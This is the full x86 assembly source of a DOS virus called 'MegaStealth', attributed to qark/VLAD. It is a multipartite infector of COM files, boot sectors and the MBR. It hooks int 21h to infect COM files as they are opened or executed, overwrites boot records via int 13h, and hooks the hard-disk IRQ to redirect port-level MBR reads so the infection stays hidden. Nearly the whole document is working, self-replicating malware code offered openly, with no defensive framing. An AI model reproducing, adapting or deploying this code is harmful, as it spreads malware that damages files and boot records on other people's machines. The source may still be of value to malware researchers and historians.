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- ; MegaStealth Virus Source by qark
- ;
- ; COM/BS/MBR Infector
- ; It uses the new form of stealth developed by the 'strange' virus in
- ; that even if you are using the original ROM int 13h the virus will
- ; still successfully stealth. It does this by hooking the hard disk
- ; IRQ, int 76h, and checking the ports for a read to the MBR. If the
- ; MBR is being read, the ports will be changed to cause a read from
- ; sector four instead.
- ;
- ; Noone has the 'strange' virus (and believe me, every VX BBS in the
- ; world has been checked), so I decided to develop the technology
- ; independently and make the information public.
- ;
- org 0
- cld
- mov ax,cs
- or ax,ax
- jz bs_entry
- jmp com_entry
- ;------------------- Boot Sector Stub ----------------
- Marker db '[MegaStealth] by qark/VLAD',0
- bs_entry:
- xor ax,ax
- mov si,7c00h
- cli
- mov ss,ax
- mov sp,si
- sti
- mov es,ax
- mov ds,ax
- sub word ptr [413h],2 ;Allocate 2k of memory.
- int 12h ;Get memory into AX.
- mov cl,6
- shl ax,cl
- mov es,ax
- mov ax,202h
- xor bx,bx
- xor dh,dh
- mov cx,2
- or dl,dl
- js hd_load
- db 0b9h ;MOV CX,xxxx
- floppy_sect dw 0
- db 0b6h ;MOV DH,xx
- floppy_head db 0
- hd_load:
- int 13h ;Read our virus in.
- mov si,13h*4
- mov di,offset i13
- movsw
- movsw
- mov word ptr [si-4],offset handler
- mov word ptr [si-2],es
- mov byte ptr es:set_21,0
- ;Test for an 8088.
- mov al,2
- mov cl,33
- shr al,cl
- test al,1
- jz no_int76 ;8088 doesn't use int76
- mov si,76h*4 ;Set int76
- mov di,offset i76
- movsw
- movsw
- mov word ptr [si-4],offset int76handler
- mov word ptr [si-2],es
- mov byte ptr es:llstealth_disable,0
- no_int76:
- int 19h ;Reload the original bootsector.
- ;------------------- COM Stub ----------------
- com_entry:
- db 0beh ;MOV SI,xxxx
- delta dw 100h
- mov ax,0f001h
- int 13h
- cmp ax,10f0h
- je resident
- mov ax,ds
- dec ax
- mov ds,ax
- cmp byte ptr [0],'Z'
- jne resident
- sub word ptr [3],7dh
- sub word ptr [12h],7dh
- mov ax,word ptr [12h]
- push cs
- pop ds
- mov es,ax
- xor di,di
- push si
- mov cx,1024
- rep movsb
- xor ax,ax ;Set int13
- mov ds,ax
- mov si,13h*4
- mov di,offset i13
- movsw
- movsw
- mov word ptr [si-4],offset handler
- mov word ptr [si-2],es
- pop bx
- push bx
- add bx,offset end_virus
- push es
- push cs
- pop es
- mov ax,201h
- mov cx,1
- mov dx,80h
- int 13h
- pop es
- mov si,21h*4
- mov di,offset i21
- movsw
- movsw
- mov word ptr [si-4],offset int21handler
- mov word ptr [si-2],es
- mov byte ptr es:set_21,1
- pop si
- resident:
- push cs
- pop ds
- push cs
- pop es
- add si,offset old4
- mov di,100h
- push di
- movsw
- movsw
- ret
- old4 db 0cdh,20h,0,0
- new4 db 0e9h,0,0,'V'
- ;------------------- Int 21 ----------------
- Int21handler:
- push ax
- push es
- mov ax,0b800h
- mov es,ax
- mov word ptr es:[340],0afafh
- pop es
- pop ax
- push ax
- xchg al,ah
- cmp al,3dh
- je chk_infect
- cmp al,4bh
- je chk_infect
- cmp al,43h
- je chk_infect
- cmp al,56h
- je chk_infect
- cmp ax,6ch
- je chk_infect
- pop ax
- exit_21:
- db 0eah
- i21 dd 0
- far_pop:
- jmp pop_21
- chk_infect:
- push bx
- push cx
- push dx
- push si
- push di
- push ds
- push es
- cmp al,6ch
- jne no_6c
- mov dx,si
- no_6c:
- mov si,dx
- cld
- keep_lookin:
- lodsb
- cmp al,'.'
- jne keep_lookin
- lodsw
- or ax,2020h
- cmp ax,'oc'
- jne far_pop
- lodsb
- or al,20h
- cmp al,'m'
- jne far_pop
- mov ax,3d02h
- call int21h
- jc far_pop
- xchg bx,ax
- mov ah,3fh
- mov cx,4
- push cs
- pop ds
- mov dx,offset old4
- call int21h
- mov ax,word ptr [old4]
- cmp al,0e9h
- jne chk_exe
- mov al,byte ptr old4+3
- cmp al,'V'
- je close_exit
- jmp infect
- chk_exe:
- or ax,2020h
- cmp ax,'mz'
- je close_exit
- cmp ax,'zm'
- je close_exit
- infect:
- call lseek_end
- or dx,dx ;Too big
- jnz close_exit
- cmp ax,63500
- ja close_exit
- cmp ax,1000
- jb close_exit
- push ax
- add ax,100h
- mov delta,ax
- pop ax
- sub ax,3
- mov word ptr new4+1,ax
- mov ax,5700h
- call int21h
- jc close_exit
- push cx
- push dx
- mov ah,40h
- mov cx,offset end_virus
- xor dx,dx
- call int21h
- jc time_exit
- call lseek_start
- mov ah,40h
- mov cx,4
- mov dx,offset new4
- call int21h
- time_exit:
- pop dx
- pop cx
- mov ax,5701h
- call int21h
- close_exit:
- mov ah,3eh
- call int21h
- pop_21:
- pop es
- pop ds
- pop di
- pop si
- pop dx
- pop cx
- pop bx
- pop ax
- jmp exit_21
- lseek_start:
- mov al,0
- jmp short lseek
- lseek_end:
- mov al,2
- lseek:
- xor cx,cx
- cwd
- mov ah,42h
- call int21h
- ret
- Int21h:
- pushf
- call dword ptr cs:i21
- ret
- set_21 db 0 ;1 = 21 is set
- ;------------------- Int 13 ----------------
- Stealth:
- mov cx,4
- mov ax,201h
- or dl,dl
- js stealth_mbr ;DL>=80H then goto stealthmbr
- mov cl,14
- mov dh,1
- stealth_mbr:
- call int13h
- jmp pop_end
- res_test:
- xchg ah,al
- iret
- multipartite:
- cmp byte ptr cs:set_21,1
- je jend
- cmp word ptr es:[bx],'ZM'
- jne jend
- push si
- push di
- push ds
- push es
- xor si,si
- mov ds,si
- push cs
- pop es
- mov si,21h*4
- mov di,offset i21
- movsw
- movsw
- mov word ptr [si-4],offset int21handler
- mov word ptr [si-2],es
- mov byte ptr cs:set_21,1
- pop es
- pop ds
- pop di
- pop si
- jmp jend
- rend:
- retf 2
- Jend:
- db 0eah ;= JMP FAR PTR
- i13 dd 0 ;Orig int13h
- Handler:
- cmp ax,0f001h ;You fool.
- je res_test
- cmp ah,2
- jne multipartite
- cmp cx,1
- jne multipartite
- or dh,dh
- jnz multipartite
- call int13h ;Call the read so we can play with
- ; the buffer.
- jc rend ;The read didn't go through so leave
- pushf
- push ax
- push bx
- push cx
- push dx
- push si
- push di
- push ds
- push es
- cmp word ptr es:[bx+offset marker],'M['
- je stealth
- mov byte ptr cs:llstealth_disable,1
- mov cx,4 ;Orig HD MBR at sector 3.
- or dl,dl ;Harddisk ?
- js write_orig ;80H or above ?
- ;Calculate shit like track/head for floppy******
- push dx
- push cs
- pop ds
- mov ax,es:[bx+18h] ;Sectors per track.
- sub es:[bx+13h],ax ;Subtract a track.
- mov ax,es:[bx+13h] ;AX=total sectors.
- mov cx,es:[bx+18h] ;CX=sectors per track
- xor dx,dx
- div cx ;Total sectors/sectors per track
- xor dx,dx
- mov cx,word ptr es:[bx+1ah] ;CX=heads
- div cx ;Total tracks/heads
- push ax
- xchg ah,al ;AX=Track
- mov cl,6
- shl al,cl ;Top 2 bits of track.
- or al,1 ;We'll use the first sector onward.
- mov word ptr floppy_sect,ax
- pop ax
- mov cx,word ptr es:[bx+1ah] ;CX=heads
- xor dx,dx
- div cx ;Track/Total Heads
- mov byte ptr floppy_head,dl ;Remainder=Head number
- mov cx,14 ;Floppy root directory.
- pop dx
- mov dh,1
- write_orig:
- mov ax,301h ;Save the original boot sector.
- call int13h
- jc pop_end
- push es
- pop ds
- mov si,bx
- push cs
- pop es ;ES=CS
- mov cx,510 ;Move original sector to our buffer.
- cld
- mov di,offset end_virus
- rep movsb
- mov ax,0aa55h ;End of sector marker.
- stosw
- push cs
- pop ds
- xor si,si
- mov di,offset end_virus
- mov cx,offset com_entry
- rep movsb
- mov bx,offset end_virus
- mov ax,301h
- mov cx,1
- xor dh,dh
- call int13h
- jc pop_end
- mov ax,302h
- mov cx,2
- xor bx,bx
- or dl,dl
- js mbr_write
- mov cx,word ptr floppy_sect
- mov dh,byte ptr floppy_head
- mbr_write:
- call int13h ;Write the virus!
- pop_end:
- mov byte ptr cs:llstealth_disable,0
- pop es
- pop ds
- pop di
- pop si
- pop dx
- pop cx
- pop bx
- pop ax
- popf
- jmp rend
- Int13h Proc Near
- ; AH & AL are swapped on entry to this call.
- pushf ;Setup our interrupt
- push cs ;Our segment
- call jend ;This will also fix our AX
- ret
- Int13h EndP
- ;------------------- Int 76 ----------------
- not_bs:
- pop es
- pop ds
- pop di
- pop dx
- pop cx
- pop bx
- pop ax
- no_stealth:
- db 0eah ;JMPF
- i76 dd 0
- Int76Handler:
- cmp byte ptr cs:llstealth_disable,1
- je no_stealth
- push ax
- push bx
- push cx
- push dx
- push di
- push ds
- push es
- mov dx,1f3h
- in al,dx ;Sector number.
- cmp al,1
- jne not_bs
- inc dx ;1f4h
- in al,dx ;Cylinder Low
- cmp al,0
- jne not_bs
- inc dx ;1f5h
- in al,dx ;Cylinder High
- cmp al,0
- jne not_bs
- inc dx ;1f6h
- in al,dx
- and al,0fh ;Remove everything but the head.
- cmp al,0 ;Head
- jne not_bs
- inc dx ;1f7h
- in al,dx
- test al,0fh
- jnz disk_read
- jmp not_bs ;Must be a write.
- disk_read:
- cld
- mov dx,1f0h
- push cs
- pop es
- mov di,offset end_virus
- mov cx,512/2
- rep insw ;Read in what they read.
- ;Now reset the whole system for a read from sector 4.
- mov dx,1f2h
- mov al,1 ;One sector.
- out dx,al
- inc dx
- mov al,4 ;Sector 4 instead.
- out dx,al ;1f3
- mov al,0
- inc dx
- out dx,al ;1f4
- inc dx
- out dx,al ;1f5
- inc dx
- mov al,0a0h
- out dx,al ;1f6
- mov dx,1f7h
- mov al,20h ;Read function.
- out dx,al
- not_done:
- in al,dx
- test al,8
- jz not_done
- jmp not_bs
- llstealth_disable db 0 ;0 means int76 enabled
- ;---------------------- 76 -------------------
- end_virus:
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